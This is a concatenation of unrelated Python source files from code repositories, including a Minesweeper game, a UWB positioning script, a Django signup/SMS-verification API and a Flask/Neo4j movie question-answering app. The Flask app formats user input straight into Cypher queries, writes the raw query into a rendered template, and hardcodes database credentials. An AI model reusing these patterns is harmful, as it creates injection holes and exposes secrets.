if self.herb_img_axis is not None:
self.herb_img_axis.set_data(herb_heat)
else:
self.herb_img_axis = self.herb_heat.imshow(
herb_heat,
interpolation="nearest",
vmin=0,
vmax=self.cmax_animals["Herbivore"],
)
cax = self._fig.add_axes([0.05, 0.5, 0.4, 0.02])
cbar = self._fig.colorbar(
self.herb_img_axis, cax=cax, orientation="horizontal"
)
cbar.set_ticks([])
cbar.ax.text(0.5, 0, "Low", va="bottom", ha="left", color="white")
cbar.ax.text(50, 0, "High", va="bottom", ha="right")
self.herb_heat.set_xticks(range(len(self.map_rgb[0])))
self.herb_heat.set_xticklabels(
labels=(range(1, 1 + len(self.map_rgb[0]))),
fontdict={"fontsize": 6},
)
self.herb_heat.set_yticks(range(len(self.map_rgb)))
self.herb_heat.set_yticklabels(
labels=range(1, 1 + len(self.map_rgb)), fontdict={"fontsize": 6}
)
def _update_carn_heatmap(self, carn_heat):
"""
Updates the heaptmap for Carnivores
"""
if self.carn_img_axis is not None:
self.carn_img_axis.set_data(carn_heat)
else:
self.carn_img_axis = self.carn_heat.imshow(
carn_heat,
interpolation="nearest",
vmin=0,
vmax=self.cmax_animals["Carnivore"],
)
self.carn_heat.set_xticks(range(len(self.map_rgb[0])))
self.carn_heat.set_xticklabels(
labels=(range(1, 1 + len(self.map_rgb[0]))),
fontdict={"fontsize": 6},
)
self.carn_heat.set_yticks(range(len(self.map_rgb)))
self.carn_heat.set_yticklabels(
labels=(range(1, 1 + len(self.map_rgb))), fontdict={"fontsize": 6}
)
def _update_specie_lines(self):
"""
Updates the population lines for Herbivore and Carnivore
"""
herb_amount = self.num_animals_per_species["Herbivore"]
ydata_herb = self._herb_line.get_ydata()
ydata_herb[self._year] = herb_amount
self._herb_line.set_ydata(ydata_herb)
carn_amount = self.num_animals_per_species["Carnivore"]
ydata_carn = self._carn_line.get_ydata()
ydata_carn[self._year] = carn_amount
self._carn_line.set_ydata(ydata_carn)
self._mean_ax.legend(["Herbivore", "Carnivore"], prop={"size": 6})
def add_population(self, population):
"""
Add a population to the island
:param population: List of dictionaries specifying population
"""
self._map.add_animals(population)
@property
def year(self):
"""Last year simulated."""
return self._year
@property
def num_animals(self):
"""Total number of animals on island."""
self._num_animals = sum(self._map.num_species_on_map())
print(self._num_animals)
return self._num_animals
@property
def num_animals_per_species(self):
"""Number of animals per species in island, as dictionary."""
tot_herbivore, tot_carnivore = self._map.num_species_on_map()
self._num_animals_per_species["Herbivore"] = tot_herbivore
self._num_animals_per_species["Carnivore"] = tot_carnivore
return self._num_animals_per_species
@property
def animal_distribution(self):
"""Pandas DataFrame with animal count per species for each cell on
island. """
list_of_dicts = []
y_lim, x_lim = np.shape(self._map.map)
for y in range(y_lim):
for x in range(x_lim):
curr_cell = self._map.map[(y, x)]
(
curr_herbivores,
curr_carnivores,
) = curr_cell.num_species_per_cell()
curr_dict = {
"Row": y,
"Col": x,
"Herbivore": curr_herbivores,
"Carnivore": curr_carnivores,
}
list_of_dicts.append(curr_dict)
df = pd.DataFrame(
list_of_dicts, columns=["Row", "Col", "Herbivore", "Carnivore"]
)
return df
def make_movie(self, movie_fmt=_DEFAULT_MOVIE_FORMAT):
"""Create MPEG4 movie from visualization images saved."""
if self.img_base is None:
raise RuntimeError("No filename defined.")
if movie_fmt == "mp4":
try:
# Parameters chosen according to
# http://trac.ffmpeg.org/wiki/Encode/H.264, section
# "Compatibility"
subprocess.check_call(
[
_FFMPEG_BINARY,
"-i",
"{}_%05d.png".format(self.img_base),
"-y",
"-profile:v",
"baseline",
"-level",
"3.0",
"-pix_fmt",
"yuv420p",
"{}.{}".format(self.img_base, movie_fmt),
]
)
except subprocess.CalledProcessError as err:
raise RuntimeError("ERROR: ffmpeg failed with: {}".format(err))
elif movie_fmt == "gif":
try:
subprocess.check_call(
[
_CONVERT_BINARY,
"-delay",
"1",
"-loop",
"0",
"{}_*.png".format(self.img_base),
"{}.{}".format(self.img_base, movie_fmt),
]
)
except subprocess.CalledProcessError as err:
raise RuntimeError(
"ERROR: convert failed with: {}".format(err)
)
else:
raise ValueError("Unknown movie format: " + movie_fmt)
| amirarfan/BioSim_G03_Amir_Sebastian | src/biosim/simulation.py | simulation.py | py | 15,901 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "map.Map",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_numbe... |
16096100007 | import pygame
import minesweeper_map as mm
pygame.init()
class minesweeper_tile():
def __init__(self, v, f=False, h=True):
self.value = v
self.flag = f
self.hidden = h
def set_value(self, v):
self.value = v
def set_flag(self):
self.flag = not self.flag
def set_hidden(self):
self.hidden = not self.hidden
class minesweeper_game():
TILE_SIZE = 20
LEFT_MOUSE_BUTTON, RIGHT_MOUSE_BUTTON = 1, 3
game_over = False
win = False
img = pygame.image.load('minesweeper_icons.png')
images = []
for i in range(12):
images.append(img.subsurface(TILE_SIZE*i, 0, TILE_SIZE, TILE_SIZE))
def __init__(self, size, bombs):
self.mmap = mm.minesweeper_map(size, bombs)
self.board_size = self.mmap.get_board_size()
self.create_tile_board()
self.create_window(self.board_size, bombs)
self.run_game()
def create_tile_board(self):
self.tile_board = [[minesweeper_tile(0) for _ in range(self.mmap.get_board_size())]
for _ in range(self.mmap.get_board_size())]
for r in range(len(self.mmap.get_board())):
for c in range(len(self.mmap.get_board()[r])):
self.tile_board[r][c].value = self.mmap.get_board()[r][c]
def create_window(self, size, bombs):
self.window = pygame.display.set_mode((size*self.TILE_SIZE, size*self.TILE_SIZE))
pygame.display.set_caption('%s Bombs Total' % (bombs))
def run_game(self):
running = True
while running:
pygame.time.delay(int(1000/60))
for e in pygame.event.get():
if e.type == pygame.QUIT:
running = False
if e.type == pygame.MOUSEBUTTONDOWN:
self.handle_mouse_interaction(e)
self.draw_window()
if self.game_over:
pygame.display.set_caption('Game Over')
pygame.time.delay(1000)
running = False
if self.win:
pygame.display.set_caption('You\'ve Won!')
pygame.time.delay(1000)
running = False
pygame.quit()
def handle_mouse_interaction(self, e):
x, y = int(pygame.mouse.get_pos()[0]/self.TILE_SIZE), int(pygame.mouse.get_pos()[1]/self.TILE_SIZE)
corr_tile = self.tile_board[x][y]
if corr_tile.hidden:
if e.button == self.LEFT_MOUSE_BUTTON:
self.handle_hidden(x, y)
if self.get_win():
self.win = True
elif e.button == self.RIGHT_MOUSE_BUTTON:
self.tile_board[x][y].set_flag()
if corr_tile.value == mm.minesweeper_map.BOMB:
if e.button == self.LEFT_MOUSE_BUTTON:
self.game_over = True
def get_win(self):
for row in self.tile_board:
for cell in row:
if cell.hidden and cell.value is not self.mmap.BOMB:
return False
return True
def handle_hidden(self, x, y):
self.tile_board[x][y].set_hidden()
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x-1, y):
if self.tile_board[x-1][y].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x-1, y)
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x+1, y):
if self.tile_board[x+1][y].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x+1, y)
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x, y-1):
if self.tile_board[x][y-1].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x, y-1)
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x, y+1):
if self.tile_board[x][y+1].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x, y+1)
def draw_window(self):
for r in range(len(self.tile_board)):
for c in range(len(self.tile_board[r])):
c_tile = self.tile_board[r][c]
if c_tile.flag:
self.window.blit(self.images[11], (r*self.TILE_SIZE, c*self.TILE_SIZE))
elif c_tile.hidden:
self.window.blit(self.images[10], (r*self.TILE_SIZE, c*self.TILE_SIZE))
else:
self.window.blit(self.images[self.tile_board[r][c].value], (r*self.TILE_SIZE, c*self.TILE_SIZE))
pygame.display.update() | mjd-programming/Minesweeper | minesweeper_game.py | minesweeper_game.py | py | 4,549 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pygame.init",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "pygame.image.load",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "pygame.image",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "minesweeper_map.minesw... |
39363534839 | import os, sys
import csv
import random
import signal
import socket
import threading
import time
import datetime
from fxpmath import Fxp
from Parse_DNN import *
from EKF_AoA import *
import numpy.matlib
import numpy as np
from numpy.linalg import inv
from numpy.core.fromnumeric import transpose
import math
from math import *
import pyvisa as visa
from colorama import Fore
import serial
import serial.tools.list_ports
import serial.serialutil
import matplotlib.pyplot as plt
# ---------------------------------TEST RUN CONFIGS---------------------------------------------------------------------
Rx_DEVICE_COM_PORT = 'com16' #responder COM Port
# ----------------------------------------------------------------------------------------------------------------------
# --------------------------------------NO EDITS BELOW------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def serial_tx(my_port, command):
b_command = command.encode()
my_port.write(b_command)
def serial_rx(my_port):
line = my_port.read_until()
line = line.strip()
return line.decode("utf-8")
def serial_trx(my_port, command):
serial_tx(my_port, command)
return (serial_rx(my_port))
def save_csv(csvf, row):
with open(csvf, "a", newline="") as F:
w = csv.writer(F)
w.writerow(row)
class Unlab_SR150_Resp():
def __init__(self):
''' Set Baudrate '''
self.scpi_rx = serial.Serial(Rx_DEVICE_COM_PORT, baudrate=230400, timeout=6)
self.delay = 3 # delay setting(sec)
'''USER INPUT VARIABLES'''
self.ekf = EKF_AoA() # EKF Object Creation
# self.ref = np.array([0.0001, 1.25]) # reference position of tag
# h_anc = 1.20 # height of anchor(SECC)
# h_tag = 1.15 # height of tag(CAR)
# self.h_diff = h_anc - h_tag
def plot(self):
plt.cla()
plt.xlabel('X(m)', labelpad=20, size=14)
plt.ylabel('Y(m)', labelpad=20, size=14)
plt.axis([-5, 5, 0, 5])
plt.xticks(np.arange(-5, 5, 0.5))
plt.yticks(np.arange(0, 5, 0.5))
for i in range(0,10):
plt.axhline((i+1)/2, -5, 5, color='lightgray', linestyle='--', linewidth=0.7)
for i in range(0,20):
plt.vlines((i-10)/2, 0, 5, color='lightgray', linestyle='--', linewidth=0.7)
x = self.X[0,0]
y = self.X[1,0]
plt.scatter(x,y,color='r',s=450)
plt.pause(0.1)
def Positioning(self):
## Reset all ##
state_ntf_rx = serial_trx(self.scpi_rx, "RST\r\n")
print(state_ntf_rx)
time.sleep(self.delay)
## Ranging start ##
state_ntf_rx = serial_trx(self.scpi_rx, "UWB MTRESP ON\r\n") # Responder Session start Command
print(state_ntf_rx)
time.sleep(self.delay)
while 1:
self.scpi_ret = serial_rx(self.scpi_rx)
try:
## Data Parsing ##
result = self.scpi_ret.split(' ')
session_id = result[0]
distance = Fxp(val="0x"+result[5]+"0x"+result[4], signed=False, n_word=16, n_frac=0).astype(int).tolist() - 10
AoA_azimuth = Fxp(val="0x"+result[7]+"0x"+result[6], signed=True, n_word=16, n_frac=7).astype(float)
PDoA_azimuth = Fxp(val="0x"+result[9]+"0x"+result[8], signed=True, n_word=16, n_frac=7).astype(float)
nlos = Fxp(val="0x"+result[10], signed = False, n_word=8, n_frac = 0).astype(int).tolist()
## convert types for dist and angle
# dist = math.sqrt(math.pow(float(distance)/100,2) - math.pow(self.h_diff,2))
dist = float(distance)/100
angle = math.pi * (float(AoA_azimuth)+90)/180
s_dist = str(dist)
# ## calculate position of TAGs
x = dist * math.cos(angle)
y = dist * math.sin(angle)
x_ref = str(x)
y_ref = str(y)
# r_X2Y2 = pow((x - self.ref[0]),2) + pow((y - self.ref[1]),2)
# r_err = str(r_X2Y2)
if result[0] == '11':
meas = np.array([[x],[y]])
self.ekf.ekf_update1(meas)
self.ekf.cnt1 = 1
print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,Fore.GREEN,"TAG 1 EKF : ({:.2f}, {:.2f})".format(self.ekf.X1[0][0],self.ekf.X1[1][0]),"\n",Fore.RESET)
elif result[0] == '22':
meas = np.array([[x],[y]])
self.ekf.ekf_update2(meas)
self.ekf.cnt2 = 1
print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,"TAG 2 EKF : ({:.2f}, {:.2f})".format(self.ekf.X2[0][0],self.ekf.X2[1][0]),"\n")
elif result[0] == '33':
meas = np.array([[x],[y]])
self.ekf.ekf_update3(meas)
self.ekf.cnt3 = 1
print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,"TAG 3 EKF : ({:.2f}, {:.2f})".format(self.ekf.X3[0][0],self.ekf.X3[1][0]),"\n")
elif result[0] == '44':
meas = np.array([[x],[y]])
self.ekf.ekf_update4(meas)
self.ekf.cnt4 = 1
print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,"TAG 4 EKF : ({:.2f}, {:.2f})".format(self.ekf.X4[0][0],self.ekf.X4[1][0]),"\n")
else : pass
# x_pos = self.X[0,0]
# y_pos = self.X[1,0]
# e_X2Y2 = pow((x_pos - self.ref[0]),2) + pow((y_pos - self.ref[1]),2)
# e_err = str(e_X2Y2)
# self.plot()
except:
pass
# # print(Fore.GREEN, x_ref, y_ref, scpi_ret,Fore.RESET)
# ## save data(.csv file) ##
# save_csv(ranging_result_csvF, [session_id, s_dist, x_pos, y_pos, x_ref, y_ref,aoa_azimuth, pdoa_azimuth])
# save_csv(ranging_result_csvF, [session_id, s_dist, x_pos, y_pos, x_ref, y_ref,aoa_azimuth, pdoa_azimuth, e_err, r_err])
# time.sleep(self.delay)
self.scpi_rx.flush()
result.clear()
if __name__ == "__main__":
# now = datetime.datetime.now()
# nowDatetime = now.strftime('%Y_%m_%d_%H_%M_%S')
# ranging_result_csvF = 'results/UWB_SR150_ranging_test_result-%s.csv' %nowDatetime
# save_csv(ranging_result_csvF, ['Session_ID','Distance','pos_X','pos_Y','ref_X','ref_Y','AoA_azimuth','PDoA_azimuth'])
# save_csv(ranging_result_csvF, ['Session_ID','Distance','pos_X','pos_Y','ref_X','ref_Y','AoA_azimuth','PDoA_azimuth', 'Estimated_Err', 'Ref_Err'])
unlab = Unlab_SR150_Resp()
unlab.Positioning() | yws94/Unlab_SR150 | prev_ver/Unlab_SR150_ver3.py | Unlab_SR150_ver3.py | py | 7,042 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "csv.writer",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "serial.Serial",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.cla",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
... |
9366591632 | # coding=utf-8
from flask import Flask, jsonify, render_template, request
from py2neo import Graph
import jw.Q_Search as search
import json
import logging
logging.basicConfig(level=logging.WARNING,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
filename='logs/pro2.log',
filemode='a')
app = Flask(__name__)
graph = Graph(
"http://118.25.74.160/",
port= 7474,
username="neo4j",
password="jinwei"
)
f = open("recommend_list.json","r")
d = json.loads(f.read())
f.close()
def buildNodes_g(nodeRecord):
data = {"id": str(nodeRecord['g']['gid']), "name": str(nodeRecord['g']['name']),"label":"Genre"}
return {"data": data}
def buildNodes_m(nodeRecord):
data = {"id": str(nodeRecord['m']['mid']), "name": str(nodeRecord['m']['title']), "label":"Movie"}
return {"data": data}
def buildNodes_p(nodeRecord):
data = {"id": str(nodeRecord['n']['pid']),
"name": str(nodeRecord['n']['pname']) if nodeRecord['n']['pname']!=None else nodeRecord['n']['eng_name'],
"label":"Person"}
return {"data": data}
def buildEdges(relationRecord):
data = {"source": str(relationRecord['r']['mid']),
"target": str(relationRecord['r']['gid']),
"relationship": relationRecord['r']._Relationship__type}
return {"data": data}
def buildEdges_act(relationRecord):
data = {"source": str(relationRecord['r']['pid']),
"target": str(relationRecord['r']['mid']),
"relationship": relationRecord['r']._Relationship__type}
return {"data": data}
def get_recommendation(entities):
try:
q = list(entities.values())[0]
print(q)
global d
return d[q]
except:
return "周星驰, 葛优, 巩俐, 冯小刚</div><div>功夫, 十面埋伏, 霸王别姬, 黄飞鸿"
@app.route('/')
def hello_world():
logging.warning("====== user ip: {} ======".format(request.remote_addr))
return render_template('index000.html')
@app.route('/search', methods=['GET'])
def index1():
return render_template('index1.html')
@app.route('/search', methods=['POST'])
def index2():
query = request.form['Search']
logging.warning("====== Query: {} ======".format(query))
#query = query.replace("\n","")
global entities
entities,answer = search.get_query_type(query)
f = open("./templates/index2.html", 'w',encoding="utf-8")
message_front ='''<!DOCTYPE html>
<html>
<head>
<title>Knowledge Graph</title>
<link href="/static/css/style.css" rel="stylesheet" />
<script src="http://cdn.bootcss.com/jquery/1.11.2/jquery.min.js"></script>
<script src="http://cdn.bootcss.com/cytoscape/2.3.16/cytoscape.min.js"></script>
<script src="/static/js/code.js"></script>
</head>
<body>'''
question = '<h3>Your Question</h3>\n<div>'+str(query).replace('\n','')+ '</div>\n'
recommendation = '<h3>You Might Like this</h3><div>'+get_recommendation(entities)+'</div>'
answer = '<h3>Answer</h3>\n<div>' + str(answer).replace('\n','<br>') + "</div>\n"
message_back='''<h3>Movie Graph</h3>
<div id="cy"></div>
</body>
</html>'''
f.write(message_front+question+answer+recommendation+message_back)
f.close()
return render_template('index2.html')
@app.route('/graph')
def get_graph():
try:
nodes = list(map(buildNodes_m, graph.run('''MATCH (n:Person)-[:actedin]->(m:Movie) where n.pname='{}' RETURN m'''.format(entities[0]))))
nodes = nodes+list(map(buildNodes_p, graph.run('''MATCH (n:Person)-[:actedin]->(m:Movie) where n.pname='{}' RETURN n'''.format(entities[0]))))
edges = list(map(buildEdges_act, graph.run('''MATCH (n:Person)-[r]->(m:Movie) where n.pname='{}' RETURN r limit 100'''.format(entities[0]))))
except:
try:
nodes = list(map(buildNodes_m, graph.run(
'''MATCH (n:Person)-[:actedin]->(m:Movie) where m.title='{}' RETURN m'''.format(entities[1]))))
nodes = nodes+list(map(buildNodes_p, graph.run(
'''MATCH (n:Person)-[:actedin]->(m:Movie) where m.title='{}' RETURN n limit 100'''.format(entities[1]))))
nodes = nodes + list(map(buildNodes_g, graph.run(
'''MATCH (m:Movie)-[:is]->(g:Genre) where m.title="{}" RETURN g'''.format(entities[1]))))
edges = list(map(buildEdges_act, graph.run(
'''MATCH (n:Person)-[r]->(m:Movie) where m.title='{}' RETURN r limit 100'''.format(entities[1]))))
edges = edges + list(map(buildEdges, graph.run(
'''MATCH (m:Movie)-[r]->(g:Genre) where m.title="{}" RETURN r limit 100'''.format(entities[1]))))
except:
#print("=============Here is OK=============")
nodes = list(map(buildNodes_m, graph.run(
'''MATCH (m:Movie)-[:is]->() where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN m''')))
nodes = nodes + list(map(buildNodes_g, graph.run(
'''MATCH (m:Movie)-[:is]->(g:Genre) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN g''')))
nodes = nodes + list(map(buildNodes_p, graph.run(
'''MATCH (n:Person)-[r]->(m:Movie) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN n''')))
edges = list(map(buildEdges, graph.run(
'''MATCH (m:Movie)-[r]->(g:Genre) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN r limit 100''')))
edges = edges + list(map(buildEdges_act, graph.run(
'''MATCH (n:Person)-[r]->(m:Movie) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN r limit 100''')))
#print("=============Here is OK=============")
# nodes = map(buildNodes, graph.cypher.execute('MATCH (n) RETURN n'))
# edges = map(buildEdges, graph.cypher.execute('MATCH ()-[r]->() RETURN r'))
return jsonify(elements = {"nodes": nodes, "edges":edges})
if __name__ == '__main__':
app.run(debug = True) | ChandlerBang/Movie-QA-System | flask_app.py | flask_app.py | py | 6,282 | python | en | code | 58 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "logging.WARNING",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "flask.Flask",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "py2neo.Graph",
... |
21620206001 | from __future__ import absolute_import
from concurrent.futures import ThreadPoolExecutor
import grpc
from apache_beam.portability.api import beam_runner_api_pb2_grpc
from apache_beam.portability.api.beam_runner_api_pb2_grpc import TestStreamServiceServicer
class TestStreamServiceController(TestStreamServiceServicer):
def __init__(self, events, endpoint=None):
self._server = grpc.server(ThreadPoolExecutor(max_workers=10))
if endpoint:
self.endpoint = endpoint
self._server.add_insecure_port(self.endpoint)
else:
port = self._server.add_insecure_port('[::]:0')
self.endpoint = '[::]:{}'.format(port)
beam_runner_api_pb2_grpc.add_TestStreamServiceServicer_to_server(
self, self._server)
self._events = events
def start(self):
self._server.start()
def stop(self):
self._server.stop(0)
self._server.wait_for_termination()
def Events(self, request, context):
"""Streams back all of the events from the streaming cache."""
for e in self._events:
yield e
| a0x8o/kafka | sdks/python/apache_beam/testing/test_stream_service.py | test_stream_service.py | py | 1,048 | python | en | code | 59 | github-code | 36 | [
{
"api_name": "apache_beam.portability.api.beam_runner_api_pb2_grpc.TestStreamServiceServicer",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "grpc.server",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "concurrent.futures.ThreadPoolExecutor",
"line_numb... |
74552228582 | """ Test File """
from flask import Flask
from redis import Redis
app = Flask(__name__)
redis_client = Redis(
host='redis_db',
port=6379
)
@app.route('/')
def hello():
"""
Main app route, simply returns a Hello
"""
count_key = redis_client.get('count')
count = int(count_key) if count_key else 0
redis_client.set('count', count+1)
return f'Hello World {count}'
if __name__ == '__main__':
app.run(host='0.0.0.0', port=int('5000'), debug=True)
| ZacharyATanenbaum/docker_dev_build_system | examples/docker_compose_services/python_docker/index.py | index.py | py | 489 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "redis.Redis",
"line_number": 7,
"usage_type": "call"
}
] |
8635132151 | # TODO :
# ElasticSearch : 검색기능 구현(DB)
# DRF Swagger(ysag) : API 문서화 작업용
# Celery(+Redis, + Naver SENS) : 문자인증을 위한 Naver SENS API 비동기 작동
# POSTMAN 설치 후 사용(DRF API Check)
import json
import os
import random
import datetime
import calendar
from django.contrib.auth import get_user_model
from django.core.exceptions import ObjectDoesNotExist
from rest_framework import generics, status
from rest_framework.authtoken.models import Token
from rest_framework.authtoken.serializers import AuthTokenSerializer
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.throttling import AnonRateThrottle
from rest_framework.views import APIView
import requests
from tables.models import TableLog
from .serializers import UserSerializer, PhoneNumberVerificationSerializer, CheckUniqueIDSerializer, \
SocialAuthTokenSerializer
User = get_user_model()
class SignupView(generics.CreateAPIView):
'''
회원가입 API.
아래 4개 필수 항목을 입력해 전달하면, 타입 유효성 검사 후 가입 처리
'username',
'password',
'name',
'phone_number'
나머지는 기입하지 않더라도 디폴트값 혹은 Null값 입력
'''
queryset = User.objects.all()
serializer_class = UserSerializer
def perform_create(self, serializer):
instance = serializer.save()
instance.set_password(instance.password)
instance.save()
date_range = [
datetime.date.today().replace(day=1) + datetime.timedelta(i)
for i in range(0, calendar.monthrange(datetime.date.today().year, datetime.date.today().month)[1])
]
for date in date_range:
for time in ['Breakfast', 'Lunch', 'Dinner', 'Snack']:
TableLog.objects.get_or_create(user=User.objects.get(pk=instance.pk), date=date, time=time)
class CheckUniqueIDView(APIView):
'''
유저 ID 중복검사를 위한 View
validation 과정에서 입력한 ID가 이미 존재하는지 체크
"unique_id" : True / False 를 리턴한다.
'''
def post(self, request):
serializer = CheckUniqueIDSerializer(data=request.data)
if serializer.is_valid():
return Response({
"unique_id": True,
"message": "사용 가능한 아이디입니다."
}, status=status.HTTP_200_OK)
return Response({
"unique_id": False,
"message": "이미 존재하는 아이디입니다."
}, status=status.HTTP_200_OK)
root_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
secrets = json.load(open(os.path.join(os.path.join(root_dir, '.secrets'), 'base.json')))
class PhoneNumberVerificationView(APIView):
'''
휴대폰 번호 인증을 위한 NAVER SENS API 연동
휴대폰 번호를 전달하면 정규식 검증(10-11자리 숫자로 이루어진 문자열 여부 확인, - 제외)
유효한 형식임이 확인되면 NAVER SENS를 통해 입력된 번호로 랜덤 인증번호(1000~9999 사이) 발송
발송에 성공한 경우 {"verifiation" : <인증번호> , "message" : <인증 성공>} 전달
실패했을 경우 {"verification" : False, "message" : <인증 실패> 전달
'''
# throttle classes : 익명 유저의 verification 신청 횟수 제한
throttle_classes = (AnonRateThrottle,)
def post(self, request):
serializer = PhoneNumberVerificationSerializer(data=request.data)
if serializer.is_valid():
service_id = secrets['SENS_SERVICE_ID']
random_num = str(random.randrange(1000, 9999))
send_url = f'https://api-sens.ncloud.com/v1/sms/services/{service_id}/messages'
headers = {
"Content-Type": "application/json; charset=utf-8",
"X-NCP-auth-key": secrets['X-NCP-AUTH-KEY'],
"X-NCP-service-secret": secrets['X-NCP-SERVICE-SECRET']
}
body = {
"type": "SMS",
"from": secrets['FROM_PHONE_NUMBER'],
"to": [
serializer.data['phone_number']
],
"content": "인증번호는 " + random_num + "입니다."
}
res = requests.post(send_url, headers=headers, data=json.dumps(body))
if not res.json()['status'] == '200':
return Response({"verification": False, "verificationNumber": "", "message": "인증번호 발송에 실패했습니다."},
status=status.HTTP_400_BAD_REQUEST)
return Response({"verification": True, "verificationNumber": random_num, "message": "인증번호가 발송되었습니다."},
status=status.HTTP_202_ACCEPTED)
class AuthTokenView(APIView):
'''
Login View.
Post 요청으로 username, password를 받아
serializer에서 사용자인증(authenticate)에 성공하면
해당 사용자와 연결된 토큰 정보를 리턴하거나 없다면 새로 생성한다.
'''
def post(self, request):
serializer = AuthTokenSerializer(data=request.data)
if serializer.is_valid():
user = serializer.validated_data['user']
token, created = Token.objects.get_or_create(user=user)
return Response({"token": token.key}, status=status.HTTP_200_OK)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class SocialAuthTokenView(APIView):
'''
Social Login View.
Post 요청으로 iOS-SNS API 통신으로 전달받은 user_id를 확인하여
이미 있던 계정이면 그에 해당하는 토큰을, 없다면 새롭게 토큰을 생성한다.
'''
def post(self, request):
serializer = SocialAuthTokenSerializer(data=request.data)
if serializer.is_valid():
token, created = Token.objects.get_or_create(user=serializer.user)[0]
return Response({"token": token.key}, status=status.HTTP_200_OK)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
'''
로그아웃 View. 유저에 할당되었던 토큰을 삭제해준다.
delete method로 request를 요청해야함
유저가 토큰을 가지고 있을 경우에만 접근 가능(IsAuthenticated)
'''
permission_classes = (IsAuthenticated,)
def delete(self, request):
try:
request.user.auth_token.delete()
except (AttributeError, ObjectDoesNotExist):
return Response({"logout": True, "message": "이미 로그아웃 처리되었습니다."},
status=status.HTTP_204_NO_CONTENT)
return Response({"logout": True}, status=status.HTTP_200_OK)
class UserProfileView(generics.RetrieveUpdateAPIView):
permission_classes = (IsAuthenticated,)
queryset = User.objects.all()
serializer_class = UserSerializer
# members/profile/로 받기 때문에, pk가 추가 인자로 들어오지 않는다.
# 따라서 lookup_urlkwarg / lookup_field > 기본값 "pk"가 주어지지 않은 경우
# request.user를 선택하여 리턴하도록 한다.
def get_object(self):
lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field
if lookup_url_kwarg not in self.kwargs:
return self.request.user
# method for creating password hashing relation
def perform_update(self, serializer):
super(UserProfileView, self).perform_update(serializer)
instance = serializer.save()
instance.set_password(instance.password)
instance.save()
| hanoul1124/healthcare2 | app/members/apis.py | apis.py | py | 7,757 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "django.contrib.auth.get_user_model",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "rest_framework.generics.CreateAPIView",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.generics",
"line_number": 29,
"usage_type": ... |
8562919260 | import time
import threading
import json
import datetime
from collections import deque
import ctypes
import os
import UpbitWrapper
from playsound import playsound
ALARM_SWITCH = True
SOUND_SWITCH = True
def tdstr(td):
days = ""
hours = ""
minutes = ""
seconds = "0"
ms = ""
if td.days != 0:
days = f"{td.days}일 "
if td.seconds // 3600 != 0:
hours = f"{td.seconds // 3600}시간 "
if (td.seconds % 3600) // 60 != 0:
minutes = f"{(td.seconds % 3600) // 60:0>2d}분 "
if td.seconds % 60 != 0:
seconds = f"{td.seconds % 60}"
if td.microseconds != 0:
ms = f".{td.microseconds:1.0f}"
return days + hours + minutes + seconds + ms + "초"
class Ticker:
def __init__(self, market_name, market_cap, price, timestamp):
self.market_name = market_name
self.market_cap = market_cap
self.price = price
self.timestamp = timestamp
class MarketMonitor:
def __init__(self, change, market, interval, cooldown):
self.market_code = market
self.change = change
self.interval = interval
self.cooldown = cooldown
self.container = deque()
self.is_active = True
self.time_disabled = 0
def state_report(self):
print('---------------')
print(f"is_active: {self.is_active}")
print(f"ALARM_SWITCH: {ALARM_SWITCH}")
print(f"num_item: {len(self.container)}")
#for i in range(len(self.container)):
# print(f"price: {self.container[i].price} time: {self.container[i].timestamp}")
print('---------------')
def update_ticker(self, item):
# self.state_report()
# print(f"newcomer: {item.timestamp}")
# restore alarm if disabled
if self.is_active == False:
alarm_checked = False
timestamp_now = datetime.datetime.now().timestamp()
if self.time_disabled + self.cooldown < timestamp_now:
self.is_active = True
# add an item
idx = 0
if len(self.container) == 0:
self.container.append(item)
return None
while idx < len(self.container) and \
